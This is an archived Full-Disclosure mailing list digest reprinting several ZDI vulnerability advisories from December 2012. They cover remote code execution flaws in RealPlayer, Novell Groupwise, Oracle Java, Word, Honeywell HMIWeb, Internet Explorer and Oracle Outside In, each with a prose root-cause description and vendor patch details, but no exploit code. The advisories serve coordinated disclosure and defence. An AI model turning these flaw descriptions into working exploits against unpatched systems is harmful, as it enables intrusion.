[lists.grok.org.uk]

- -- Disclosure Timeline:
2012-03-14 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Anonymous

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRYXVVtgMGTo1scAQIroAgAt/563d86coSO3lzRBv3abXO4+lC1IhEJ
DOGYcqAPqJ7IIURCpFI6k+8CqRa6gG+HZIv7WrIyiZnya7HcC64Kb6stQjL2aaTw
lrAa9J5FsuWyOW7/1UM7nfJ06EXe0splcFFNYVjdjJlNSI0RClzQNYNreLtGbDbB
Gqve1qSbbGwmb8b9nxkfsgrd0nA1jNyJULfd0OLAg5WRZkoFyvKG3UXEBPPslUtH
uOBG1mb8S7l0zfweTVObNQlie23ccgr9Yd97HcH8lc3fUW4W/gROgk54J4gocmZz
Jk+xYyAlAa8p0ejV0Y7BY2VoBDYiYPSNH2Kz65b+ecK81BFera9xbA==
=dDcB
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

Message: 8
Date: Fri, 21 Dec 2012 06:40:48 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-195 : RealNetworks RealPlayer ATRAC
Sample Decoding Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

, full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-195 : RealNetworks RealPlayer ATRAC Sample Decoding Remote Code
Execution Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2012-0928

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
RealNetworks

- -- Affected Products:
RealNetworks RealPlayer

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12482.
For further product information on the TippingPoint IPS, visit:

[lists.grok.org.uk]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of RealNetworks Real Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists when the application attempts to decode an audio
sample that is encoded with the ATRAC codec. While parsing sample data, the
application will explicitly trust 2-bits as a loop counter which can be
used to write outside the bounds of the target buffer. This can lead to
code execution under the context of the application.

- -- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:

[lists.grok.org.uk]

- -- Disclosure Timeline:
2011-10-28 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Andrzej Dyjak

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRYylVtgMGTo1scAQIvqwf+InLpJWTUfaN65tPUF5tIc5bkT3QBCEe6
tkvHCcTDLyftl1dBgXSkiy8wtCYrcDp0pWaOHYXtlRTzOxOZA4hjf2Tn66EPYVBy
JPKFWnTrkHhlC6Bc/6l44LeVtV/LcygPtANr4J7FNqWfIUZ4eaV1NLqGra7tm4hJ
kW/Vn8Syno9+WICi1FbV23KLeSvooRqvHtiNCKhsrKqFOyOBfSQlMO6Gp+n0j8JF
Bl1XfWPEGRM6do4I/+1Sk9GuyKT6Smu8qcwT6X2334UHYfEHZLGDlHgNiAtB++XE
KAamtcf8JRIMxT05hwJl8T10U5LiKucuxTr/gVT86niHTDPG2+A0Cg==
=77vg
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

Message: 9
Date: Fri, 21 Dec 2012 06:42:25 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-196 : Novell Groupwise GWIA
ber_get_stringa Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

, full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-196 : Novell Groupwise GWIA ber_get_stringa Remote Code Execution
Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2012-0417

- -- CVSS:
10, AV:N/AC:L/Au:N/C:C/I:C/A:C

- -- Affected Vendors:
Novell

- -- Affected Products:
Novell Groupwise

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12495.
For further product information on the TippingPoint IPS, visit:

[lists.grok.org.uk]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Novell Groupwise. Authentication is not
required to exploit this vulnerability.

The flaw exists within the Groupwise Internet Agent component, specifically
the optional LDAP server which listens on tcp port 389. When parsing a BER
encoded parameter the specified size is used to allocate a destination
buffer. A properly encoded BER chunk could cause an integer size value to
wrap before buffer allocation. A remote attacker can exploit this
vulnerability to execute arbitrary code under the context of the SYSTEM
account.

- -- Vendor Response:

Novell has issued an update to correct this vulnerability. More details can
be found at:

[lists.grok.org.uk]

- -- Disclosure Timeline:
2011-10-21 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Francis Provencher From Protek Research Lab's

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRZJlVtgMGTo1scAQK79gf+JjzJEnHzMsddv86rxWEgVxgPaHb+Ih0N
2OT1aPxDpHIDBA3hZg6iAGMuQVYj8Ot623NsLWKyAM7dpdEcaHgifW8zgThyEhdP
m5eMslAOkuQ93NuqQqL4HAm0L6caNHQJ6Eqwn3Skg0UC5osJrH3SWmagLSGaiLJ1
SlfYD3CxbI/NeShIV93lSRqRXvqIf9wFsQrXNoJgw0shlJw3MBe+t4/NX5wt5fba
Vo/5BtmcpHZQawOd8FMmwoggvfhkoFc5BE1nncZSSfWCpeZ1raIUAmIFwZVj4THy
91GD++j9PKHc4QYJO2FVrlA0xJqXrSehz2XSLb/z9QZeCk3S1lKBGg==
=P609
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

Message: 10
Date: Fri, 21 Dec 2012 06:43:39 -0600
From: ZDI Disclosures
Subject: [Full-disclosure] ZDI-12-197 : Oracle Java
java.beans.Statement Remote Code Execution Vulnerability
To: Full Disclosure , BugTraq

, full-disclosure@lists.grok.org.uk
Message-ID:
Content-Type: text/plain; charset="iso-8859-1"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-197 : Oracle Java java.beans.Statement Remote Code Execution
Vulnerability

[lists.grok.org.uk]

December 21, 2012

- -- CVE ID:
CVE-2012-1682

- -- CVSS:
9, AV:N/AC:L/Au:N/C:P/I:P/A:C

- -- Affected Vendors:
Oracle

- -- Affected Products:
Oracle Java Runtime

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Oracle Java. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page
or open a malicious file.

The specific flaw exists within the java.beans.Expression class. Due to
unsafe handling of reflection of privileged classes inside the Expression
class it is possible for untrusted code to gain access to privileged
methods and properties. This can result in remote code execution under the
context of the current process.

- -- Vendor Response:
Oracle has issued an update to correct this vulnerability. More details can
be found at:

[lists.grok.org.uk]

15.html

- -- Disclosure Timeline:
2012-07-24 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* James Forshaw (tyranid)

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[lists.grok.org.uk]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[lists.grok.org.uk]

Follow the ZDI on Twitter:

[lists.grok.org.uk]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRZdVVtgMGTo1scAQKYuAf8C4LTqhJ1Bk+usVtZ2mRjALe7+gTVvTk6
j/q9Zqy/XsimBYXIiJW2QRt+CJqS/9e/8M+xH14FkSmZRGhHDaVR0tZ8cTuHPopm
C3XnhzIJOk9XdoA8HdHVnMmd7vACA+ILyAX4n8feDHDHqUH7eTBZ3zdILxNTidQi
cZgB67wqsOtsl8shsblGivkRWzlcheIC5492M17wwCr+PgMcg9xtSp3uD7MbNsNL
BSOojIqMEhEhzDZ8P2wOBcSMN1EaSAxJYhHAI+ABfdp8LZ9IJt6GfIfoyzf34GQY
dE7XrJMm0BVfd6oHQaArEcH6sI6XPU7RlMVJNvXUH4XuJH9Qww/lRw==
=TyDY
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: [lists.grok.org.uk]

------------------------------

_______________________________________________

Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [lists.grok.org.uk]

End of Full-Disclosure Digest, Vol 94, Issue 27

***********************************************

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] ZDI-12-201 : Microsoft Office Word PAPX Section Remote Code Execution Vulnerability (no replies)

ZDI Disclosures — Fri, 21 Dec 2012 21:04:30 +0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-201 : Microsoft Office Word PAPX Section Remote Code Execution
Vulnerability
[www.zerodayinitiative.com]
December 21, 2012

- -- CVE ID:
CVE-2012-0182

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
Microsoft

- -- Affected Products:
Microsoft Office Word

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11933.
For further product information on the TippingPoint IPS, visit:

[www.tippingpoint.com]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office Word. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within how the application parses a PAPX FKP
sections. When parsing a PAPX FKP section, the application will store a
calculation. However, when repairing a damaged document, the application
will explicitly trust this calculation in a loop that is used to index into
an array of objects. This will allow for an out-of-bounds access of an
object which can lead to code execution under the context of the
application.

- -- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details
can be found at:
[technet.microsoft.com]

- -- Disclosure Timeline:
2011-05-25 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Anonymous

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[www.zerodayinitiative.com]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[www.zerodayinitiative.com]

Follow the ZDI on Twitter:

[twitter.com]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRa+VVtgMGTo1scAQLlWAf+Jjl7W056kyGU3AGbmPhW1+dd3b0Skh3Q
EHGGJtrR4sGu5g2GaluVqSd7JZA0zbTzZhKgj4IuC8xfThtAfeU/5EuF7eX7LEXz
vz92fQDx9ulv41tFLw81nTR9yk63Baq93CT6FwszPF5Edr9jrVyw/havhU5OgoFp
vsknQnmDyIyXXkYN0iRWEKhDmopssY1Mnmj1ZvrKtYc8lRUd7p9vD8PQ8P6in9pS
0IoENc3SoKb4CDbAUY1PVjbeAF0+3sHjG95DNoycmFsRc8xvw1eJwW9vx5EvRAwU
JsUTdLb/LK81dB+PNoov3feYNOUAwaLHW5vQX6ybOS02MHEfyMozCg==
=ooOU
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] ZDI-12-203 : Honeywell HMIWeb Browser ActiveX Control RequestDSPLoad Remote Code Execution Vulnerability (no replies)

ZDI Disclosures — Fri, 21 Dec 2012 20:56:34 +0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-203 : Honeywell HMIWeb Browser ActiveX Control RequestDSPLoad Remote
Code Execution Vulnerability
[www.zerodayinitiative.com]
December 21, 2012

- -- CVE ID:
CVE-2012-2054

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
Honeywell

- -- Affected Products:
Honeywell HMIWeb

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11490.
For further product information on the TippingPoint IPS, visit:

[www.tippingpoint.com]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Honeywell HMIWeb. User interaction is required
to exploit this vulnerability in that the target must visit a malicious
page or open a malicious file.

The specific flaw exists within the ActiveX control defined within the
HSCDSPRenderDll.dll file. The RequestDSPLoad method does not properly
verify the length of a supplied argument before copying it into a
fixed-length heap buffer. A remote attacker can abuse this to execute
arbitrary code under the context of the user running the browser.

- -- Vendor Response:
Honeywell states:
[www.us-cert.gov]

- -- Disclosure Timeline:
2011-11-23 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Anonymous

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[www.zerodayinitiative.com]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[www.zerodayinitiative.com]

Follow the ZDI on Twitter:

[twitter.com]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRbzFVtgMGTo1scAQKiCwgAoxez+OmYBC/g4SrLZ087spc8UA8fa9K0
eAdCpN0+rQ5MeJJQt4/ndN9x138HIEqRFUECf+pkNExG9KOGgrn3nI3n06Lig1w+
HtKwTSeYatzo7fLdTwT/9yp5rXsi31o2yUsxFYnDLLHTA9ElGQTWa/RHLKYUHafi
AltA6yv4PfgvlJx2DJbPiwrBSMgg0kQGRc2o/g9lvjltLvXoYnFQQKoHRsTQdGcY
LP8Ki5emZcqf675IJ5VWi0a+TG43UMXb/wwsooK5EB8CycqvGrq/+9Mr/xh0FBlq
Ej7BDhk9LjLZ+wtgJIjG2Z+CzhzdSpBSx58q8sscRS5gL6JxpzY51g==
=PNOJ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] ZDI-12-192 : Microsoft Internet Explorer insertRow Remote Code Execution Vulnerability (no replies)

ZDI Disclosures — Fri, 21 Dec 2012 20:56:34 +0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-192 : Microsoft Internet Explorer insertRow Remote Code Execution
Vulnerability
[www.zerodayinitiative.com]
December 21, 2012

- -- CVE ID:
CVE-2012-1880

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
Microsoft

- -- Affected Products:
Microsoft Internet Explorer

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12382.
For further product information on the TippingPoint IPS, visit:

[www.tippingpoint.com]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User interaction
is required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Internet Explorer handles
consecutive calls to insertRow. When the number of rows reaches a certain
threshold the program fails to correctly relocate certain key objects. This
can lead to a use-after-free vulnerability which can result in remote code
execution under the context of the current process.

- -- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details
can be found at:
[technet.microsoft.com]

- -- Disclosure Timeline:
2012-03-14 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Anonymous

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[www.zerodayinitiative.com]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[www.zerodayinitiative.com]

Follow the ZDI on Twitter:

[twitter.com]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRXqlVtgMGTo1scAQIolwgAlfWawonK1BetraIK8viDhg/z4Eb5RTse
hOfWDOxNdY0glskLeI1ylrtr0nXJSvj+8q5T6DcsEaz48nEdsv/ObO+d6JREzwTL
3gUJ9fUeMWZubmUmm2cKkgdenmEkK0p8EZqQ5puUpuVffeFC/f8Dn679MGlwL73v
Zato0rHoJuBedfxOYsQ+UkYwre97ickYkw/dl0LMgce5IRxKROnsR3u4+yPUVOWt
Vqo0zEPXKGdPUY3L/AjgowwqvOGsf0OmQESBLZi+pGhO2PxWjb5aBm+gFPBkRpNl
ON1yduQfblrmsrCEHZf/od/A/r7YyLeI4dxkOGb0vR7FmBr2OcZfBA==
=/GjQ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] ZDI-12-202 : Oracle Outside In WordPerfect File Processing Remote Code Execution Vulnerability (no replies)

ZDI Disclosures — Fri, 21 Dec 2012 20:56:34 +0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-202 : Oracle Outside In WordPerfect File Processing Remote Code
Execution Vulnerability
[www.zerodayinitiative.com]
December 21, 2012

- -- CVE ID:

- -- CVSS:
10, AV:N/AC:L/Au:N/C:C/I:C/A:C

- -- Affected Vendors:
Oracle

- -- Affected Products:
Oracle Outside In

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable products utilizing the Oracle Outside In technology. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of WordPerfect files. When
parsing font records the code within vswp5.dll does not validate the
datasize value prior to performing arithmetic on it. The result is used to
make a heap allocation
that can be undersized which can be leveraged to corrupt memory leading to
arbitrary code execution under the context of the user running the
application.

- -- Vendor Response:
Oracle has issued an update to correct this vulnerability. More details can
be found at:
[www.oracle.com]

- -- Disclosure Timeline:
2011-12-19 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* gwslabs.com

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[www.zerodayinitiative.com]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[www.zerodayinitiative.com]

Follow the ZDI on Twitter:

[twitter.com]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRbS1VtgMGTo1scAQLtawf+NavpWL26tU6y1s3RFh81GzTU2csrKhs0
dwA25lag4dNG6rFop9kYSqZStxLMoel3HZnk0M8xEQkLtNTzHL30FKtabUUFRYG+
5oIZkP/xf8LbVCnrCwqwz+vpzQScYUpxFt9zn7gGkBeTJfmTygC5JLNR3k/j9NI7
b2B5UKwuZRK6M0j8wwxeZ9MyDw4Khn4Jy8S+Mx2wnyiZH/MbeYJsK05SigXUthY/
49tZGNy4JDAHITDoL8BkmLcrRWqgHpAaXB5+ad7vDuXy9IlXRCzrSsyvhf7p7CD6
vR+a6rINBLS9lqXfF13nhLS/j/WqMJANLT6Nm6V846Oar4wRBcRDpQ==
=9CB1
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] ZDI-12-200 : Microsoft Internet Explorer 9 CTreeNode Remote Code Execution Vulnerability (no replies)

ZDI Disclosures — Fri, 21 Dec 2012 20:56:34 +0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ZDI-12-200 : Microsoft Internet Explorer 9 CTreeNode Remote Code Execution
Vulnerability
[www.zerodayinitiative.com]
December 21, 2012

- -- CVE ID:
CVE-2012-2548

- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

- -- Affected Vendors:
Microsoft

- -- Affected Products:
Microsoft Internet Explorer 9

- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12584.
For further product information on the TippingPoint IPS, visit:

[www.tippingpoint.com]

- -- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User interaction
is required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Internet Explorer handles CTreeNode
objects. By manipulating a document's elements an attacker can force a
dangling pointer to be reused after it has been freed. The issue lies in a
possible type confusion between a CTreeNode object and an ISpanQualifier
instance during the layout of a document being performed. An attacker can
leverage this vulnerability to execute code under the context of the
current process.

- -- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details
can be found at:
[technet.microsoft.com]

- -- Disclosure Timeline:
2012-07-24 - Vulnerability reported to vendor
2012-12-21 - Coordinated public release of advisory

- -- Credit:
This vulnerability was discovered by:
* Stephen Fewer of Harmony Security (www.harmonysecurity.com)

- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

[www.zerodayinitiative.com]

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

[www.zerodayinitiative.com]

Follow the ZDI on Twitter:

[twitter.com]

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 1950)
Charset: utf-8

wsBVAwUBUNRal1VtgMGTo1scAQIdiAf+N0Ri4mHa6zefY/tisSShB3G5ZWJ076cC
hBUmPKnLfsbOtDfvk7rBn7Z8sM3aDeF3nTxFPd2bJcwMsG1udvjBhZ7nxEb6nKpi
7iqzb0rqw0oKagzYSScM9JPd6SRTgcf8koS0MQZ3j4QoPAsoy/u9KfadXoa2agY/
f8CQ9KMtimUU4cJJM/VUNWmmgBY9Lv8Ju1DzrTpUwp7zXSsHDFcU11p9ImAunSTL
Of1Be64loCpkj71OtkOVjkIyoa1EqCM2buol5tzx4VrkfSMnn/s8iregl8p2QRAY
KYPf07uIrBrf83LbzKuUcQ1ar+4dHYBhamOQXl1DVjs7WF1wl+JYmQ==
=imrZ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]